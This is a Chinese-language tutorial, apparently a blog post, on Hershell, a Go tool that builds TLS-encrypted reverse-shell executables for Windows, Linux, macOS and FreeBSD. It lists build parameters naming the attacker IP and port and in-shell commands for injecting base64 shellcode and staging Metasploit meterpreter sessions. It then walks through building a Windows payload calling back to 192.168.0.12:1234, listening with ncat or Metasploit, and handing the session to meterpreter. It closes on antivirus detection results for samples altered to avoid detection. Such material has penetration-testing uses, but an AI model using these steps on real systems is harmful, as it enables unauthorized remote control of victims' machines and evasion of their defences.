Hershell是一款go语言编写的多平台反向shell生成器,使用tls加密流量,并提供证书公钥指纹固定功能,防止流量拦截。
支持的系统如下:
- mac
- linux
- windows
- FreeBSD及其衍生版本
安装Hershell(已安装go环境),使用go get github.com/lesnuages/hershell 即可拉取项目,或者使用git clone 拉取项目到本地也可。下面是工具的一些参数:
- GOOS : the target OS
- GOARCH : the target architecture
- LHOST : the attacker IP or domain name
- LPORT : the listener port
- depends : generate the server certificate (required for the reverse shell)
- windows32 : builds a windows 32 bits executable (PE 32 bits)
- windows64 : builds a windows 64 bits executable (PE 64 bits)
- linux32 : builds a linux 32 bits executable (ELF 32 bits)
- linux64 : builds a linux 64 bits executable (ELF 64 bits)
- macos32 : builds a mac os 32 bits executable (Mach-O)
- macos64 : builds a mac os 64 bits executable (Mach-O)
一些额外的说明:
- run_shell : drops you an system shell (allowing you, for example, to change directories)
- inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
- meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
- exit : exit gracefully
实操:
首先生成一个证书:
代码语言:javascript复制make depends
以windows为例,生成一个客户端,其他平台同理:
代码语言:javascript复制make windows64 LHOST=192.168.0.12 LPORT=1234
然后开启监听,可以使用如下程序监听:
- socat
- ncat
- openssl server module
- metasploit multi handler(python/shell_reverse_tcp_ssl payload)
以ncat为例;
在得到shell以后,还可以与msf进行同传,支持msf以下的payload:
- windows/meterpreter/reverse_tcp
- windows/x64/meterpreter/reverse_tcp
- windows/meterpreter/reverse_http
- windows/x64/meterpreter/reverse_http
- windows/meterpreter/reverse_https
- windows/x64/meterpreter/reverse_https
首先msf开启监听:
然后hershell进行同传:
代码语言:javascript复制[hershell]> meterpreter https 172.16.122.105:8443msf收到shell
查杀效果如下(已对样本进行处理,避免被杀样本的情况):
